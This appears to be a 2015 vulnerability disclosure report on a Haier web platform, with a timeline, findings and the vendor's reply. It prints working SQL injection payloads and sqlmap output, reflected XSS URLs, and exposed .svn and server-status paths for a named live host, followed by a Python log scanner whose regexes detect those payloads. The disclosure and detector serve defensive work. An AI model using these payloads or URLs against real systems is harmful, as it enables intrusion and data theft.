2015-10-13: Details reported to the vendor; awaiting vendor response
2015-10-13: Vendor confirmed; details disclosed to the vendor only
2015-10-23: Details disclosed to core white hats and relevant domain experts
2015-11-02: Details disclosed to regular white hats
2015-11-12: Details disclosed to intern white hats
2015-11-27: Details disclosed to the public

Summary: numerous problems
0x01 SQL injection:
http://s.haier.com/haierproject/saas/aaa.php?q=3458115
Payload (sqlmap output):

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: http://s.haier.com:80/haierproject/saas/aaa.php?q=-8538' OR 6060=6060 AND 'tiLz' LIKE 'tiLz

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: http://s.haier.com:80/haierproject/saas/aaa.php?q=3458115' AND (SELECT * FROM (SELECT(SLEEP(5)))CGLG) AND 'CXWe' LIKE 'CXWe

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: http://s.haier.com:80/haierproject/saas/aaa.php?q=3458115' UNION ALL SELECT NULL,CONCAT(0x71786a7a71,0x6f4f665174687a594a45,0x7170716b71),NULL-- 
---
[INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.12, Apache 2.4.4
back-end DBMS: MySQL 5.0.12
current user is DBA: True
0x02 SVN metadata leak: there are many exposed .svn directories under /haierproject/saas/; the list below is probably incomplete, please check the rest yourselves.

http://s.haier.com/haierproject/Multimedia/upload/image/.svn/entries
http://s.haier.com/haierproject/saas/images/.svn/entries
http://s.haier.com/haierproject/saas/js/.svn/entries
http://s.haier.com/haierproject/saas/phpexcel/.svn/entries
0x03 Directory listing: same situation as above, mostly under the /haierproject/ directory; the list is incomplete, please check the rest yourselves.

http://s.haier.com:80/css/
http://s.haier.com:80/haierproject/
0x04 XSS: this is the most numerous category, so here are just a few random examples:

http://s.haier.com/haierproject/fankui-new/fankui/new/pinglun.php?order=r&aid=541&uid=&username=&code=ca7fa90b707b28dc4033b2125efe1de1%22%3E%3CScRiPt%3Ealert%28%27wooyun%27%29%3C/ScRiPt%3E
http://s.haier.com/haierproject/fankui-new/fankui/new/site-info-encrypt.php?fr=pingjia%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
http://s.haier.com/km100survey/faces/login.jsp?from=xxx%22%3E%3Cscript%3Ealert%28%27wooyun%27%29%3C/script%3E
http://s.haier.com/km100survey/faces/public/registers.jsp?from=xxx%22%3E%3Cscript%3Ealert%28%27wooyun%27%29%3C/script%3E
0x05 Other information disclosure (Apache mod_status page exposed):
http://s.haier.com/server-status
No screenshots for the SVN leak and the like.
[screenshot: SQL injection]
[screenshot: XSS]
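A defender-side log check for the finding classes in this report, written here as an added example (it is not part of the original report or of any Haier system): it URL-decodes each request line of an Apache-style access log and flags the three sqlmap payload shapes listed above (boolean, time-based, UNION), requests for `.svn/` metadata, reflected `<script>` payloads and hits on `/server-status`. The log lines are constructed; directory listing cannot be told apart from a normal index page using the request line alone, so it is not covered.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not taken from the report); the request
# paths mirror the finding classes listed above. Line 1 is a benign control.
SAMPLE_LOG = """\
10.0.0.5 - - [13/Oct/2015:10:01:02 +0800] "GET /haierproject/saas/aaa.php?q=3458115 HTTP/1.1" 200 512
10.0.0.5 - - [13/Oct/2015:10:01:03 +0800] "GET /haierproject/saas/aaa.php?q=-8538'%20OR%206060=6060%20AND%20'tiLz'%20LIKE%20'tiLz HTTP/1.1" 200 512
10.0.0.5 - - [13/Oct/2015:10:01:09 +0800] "GET /haierproject/saas/aaa.php?q=3458115'%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))CGLG)%20AND%20'CXWe'%20LIKE%20'CXWe HTTP/1.1" 200 512
10.0.0.5 - - [13/Oct/2015:10:01:10 +0800] "GET /haierproject/saas/aaa.php?q=3458115'%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x71786a7a71,0x6f4f665174687a594a45,0x7170716b71),NULL--%20 HTTP/1.1" 200 640
10.0.0.5 - - [13/Oct/2015:10:02:00 +0800] "GET /haierproject/saas/js/.svn/entries HTTP/1.1" 200 2048
10.0.0.5 - - [13/Oct/2015:10:03:00 +0800] "GET /km100survey/faces/login.jsp?from=xxx%22%3E%3Cscript%3Ealert%28%27wooyun%27%29%3C/script%3E HTTP/1.1" 200 900
10.0.0.5 - - [13/Oct/2015:10:03:30 +0800] "GET /server-status HTTP/1.1" 200 3000
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<path>\S+) HTTP/')

# (finding label, pattern run over the URL-decoded request path)
RULES = [
    ("sqli-boolean",  re.compile(r"'\s*(?:OR|AND)\s+\d+\s*=\s*\d+", re.I)),
    ("sqli-time",     re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\(", re.I)),
    ("sqli-union",    re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I)),
    ("svn-metadata",  re.compile(r"/\.svn/")),
    ("xss-reflected", re.compile(r"<\s*script\b|javascript:", re.I)),
    ("server-status", re.compile(r"^/server-status(?:[/?]|$)")),
]

def classify_request(raw_path: str) -> list[str]:
    """Labels matching one request path; decoded twice so %25xx double
    encoding is seen as well."""
    decoded = unquote_plus(unquote_plus(raw_path))
    return [label for label, rx in RULES if rx.search(decoded)]

def scan_log(text: str) -> list[tuple[int, str, str]]:
    """(line number, label, raw path) for every flagged request line."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if m:
            for label in classify_request(m.group("path")):
                hits.append((n, label, m.group("path")))
    return hits

if __name__ == "__main__":
    for n, label, path in scan_log(SAMPLE_LOG):
        print(f"line {n}: {label}: {path[:60]}")
```

A default access log only records the request line, so POST bodies never reach this check; it is a triage aid for spotting probing like the above, not a substitute for parameterised queries, denying `.svn/` paths, `Options -Indexes` and restricting `/server-status` in the Apache configuration.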
Fix suggestion: this platform has so many problems that it should be rebuilt from scratch.

Severity: High
Vulnerability Rank: 14
Confirmed: 2015-10-13 17:56
Vendor reply: Thanks to the WooYun platform white hats for the testing and the heads-up; we have assigned staff to handle it.

Latest status: none yet